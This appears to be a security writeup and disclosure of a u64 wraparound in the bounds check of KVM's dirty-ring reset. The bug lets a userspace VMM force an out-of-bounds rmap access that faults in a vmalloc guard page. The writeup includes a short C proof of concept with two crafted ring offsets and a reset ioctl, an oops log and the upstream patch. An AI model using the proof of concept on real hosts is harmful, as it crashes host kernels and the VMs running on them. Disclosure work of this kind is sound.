back

A KVM dirty-ring OOB

Pixel-art diagram of a KVM dirty-ring offset wrapping through a bounds check, then indexing backward into the vmalloc guard page before the rmap array.
Dirty-ring entries are writable from the VMM. A wrapped offset passes the check, then indexes 504 bytes before the rmap array into the vmalloc guard page.

A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.

Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking"), the original 5.10 dirty-ring patch.

Setup: the dirty ring is shared writable

KVM's dirty-ring tracking tells the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The VMM maps ring pages with PROT_READ | PROT_WRITE so it can ack entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 leaves VM_WRITE intact for dirty-ring pages. No later policy limits which fields the VMM can write.

During reset, the kernel reads slot and offset back from the ring after the VMM has had a chance to overwrite them.

// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot   = READ_ONCE(entry->slot);    // attacker-controlled
next_offset = READ_ONCE(entry->offset);  // attacker-controlled

READ_ONCE prevents compiler re-reads. It performs no validation against the value the kernel originally wrote. The trust boundary points the wrong way.

Root cause: the bounds check wraps in u64

Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:

// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
    return;

Both offset and __fls(mask) are u64. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the sum is 0x10000000000000000, truncated to 0. Zero is less than npages, so the check passes. The wrapped offset value, still 0xFFFFFFFFFFFFFFC1, propagates downstream.

Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:

// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
    mask |= 1ull << delta;
    continue;
}

Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set. __fls(mask) = 63. The wrap fires.

Downstream: OOB into the rmap array

The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:

// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];
// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
    rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                            PG_LEVEL_4K, slot);
    rmap_write_protect(rmap_head, false);
    mask &= mask - 1;
}

With the wrap, idx evaluates to 0xFFFFFFFFFFFFFFC1. Interpreted as a signed offset into the array, that is -63. Since sizeof(struct kvm_rmap_head) = 8, the addressable target is exactly 8 * 63 = 504 bytes before the rmap allocation. Varying which bit in mask drives __fls yields a backward window of [-8, -504] bytes from rmap_array_base.

rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.

Where the rmap lives

The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:

// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);

__vcalloc() wraps __vmalloc_array_noprof(). The rmap allocation uses vmalloc. Every vmalloc area allocated through __get_vm_area_node() gets a guard page reserved immediately before it unless VM_NO_GUARD is set. The rmap array leaves VM_NO_GUARD unset. The 4 KiB region directly before the rmap base is an unmapped guard page. Page tables descend into the region, but the leaf PTE is zero.

The OOB window is [-8, -504] bytes. The guard page is 4096 bytes. The window fits inside the guard for every allocator configuration. The OOB load faults. The conditional write below it never executes.

Runtime verification

Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):

BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1   RBX: 8000000000000001
RDI: ffffaa6580034e08   RDX: ffffaa6580035000

Every register tells you exactly what happened:

This outcome is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.

Reachability of the conditional write

The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so:

The OOB access faults before any value reaches downstream code. It is a host-kernel oops, full stop.

Proof of concept

Two ring entries with crafted offset values, a KVM_RESET_DIRTY_RINGS ioctl, and a host that panics on the spot:

// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd  = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
//     create a vCPU, run it long enough to push entries ...

// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
    PROT_READ | PROT_WRITE, MAP_SHARED,
    vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);

// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
    ring[i].flags = KVM_DIRTY_GFN_F_RESET;
    if (i == target_idx) {
        ring[i].slot   = 0;
        ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL;   // wraps the bound
    } else if (i == target_idx + 1) {
        ring[i].slot   = 0;
        ring[i].offset = 0;                       // delta = 63
    }
}

// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);

Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Guests cannot trigger this path. The ring is mapped only from the vCPU fd, which only the VMM holds.

Impact

FactorValue
Attack vectorLocal (VMM process with /dev/kvm)
ComplexityLow (mmap + two ioctls)
Privileges required/dev/kvm access, typically kvm group
User interactionNone
ScopeUnchanged. VMM userspace crashes the host kernel
ConfidentialityNone (OOB load is consumed internally, no readback channel)
IntegrityNone (the OOB access faults before any value is loaded)
AvailabilityHigh (deterministic host kernel oops/panic)

The upstream fix

The patch is two lines. It splits the addition so the first sub-expression cannot wrap, and the second sub-expression can only execute once offset is known small. memslot->npages is bounded well below U64_MAX, so once offset < npages holds and __fls(mask) < BITS_PER_LONG, the sum cannot overflow into the valid range.

--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);

Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).

The rmap array is __vcalloc'd. The OOB walks into vmalloc's guard page, away from adjacent kernel memory. The allocator decision kept this bounded.

References

FieldValue
Upstream commit577a8d3bae05
TitleKVM: Reject wrapped offset in kvm_reset_dirty_gfn()
Fixesfb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
StableCc: stable@vger.kernel.org. Backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+)